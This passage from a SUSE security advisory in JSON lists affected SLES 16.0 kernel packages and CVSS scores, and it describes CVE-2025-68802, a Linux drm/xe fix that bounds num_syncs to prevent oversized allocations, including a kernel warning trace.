"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68802"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Limit num_syncs to prevent oversized allocations\n\nThe exec and vm_bind ioctl allow userspace to specify an arbitrary\nnum_syncs value. Without bounds checking, a very large num_syncs\ncan force an excessively large allocation, leading to kernel warnings\nfrom the page allocator as below.\n\nIntroduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request\nexceeding this limit.\n\n\"\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124\n...\nCall Trace:\n \u003cTASK\u003e\n alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416\n ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317\n __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348\n __do_kmalloc_node mm/slub.c:4364 [inline]\n __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388\n kmalloc_noprof include/linux/slab.h:909 [inline]\n kmalloc_array_noprof include/linux/slab.h:948 [inline]\n xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158\n drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797\n drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894\n xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:598 [inline]\n __se_sys_ioctl fs/ioctl.c:584 [inline]\n __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n...\n\"\n\nv2: Add \"Reported-by\" and Cc stable kernels.\nv3: Change XE_MAX_SYNCS from 64 to 1024. (Matt \u0026 Ashutosh)\nv4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt)\nv5: Do the check at the top of the exec func. (Matt)\n\n(cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
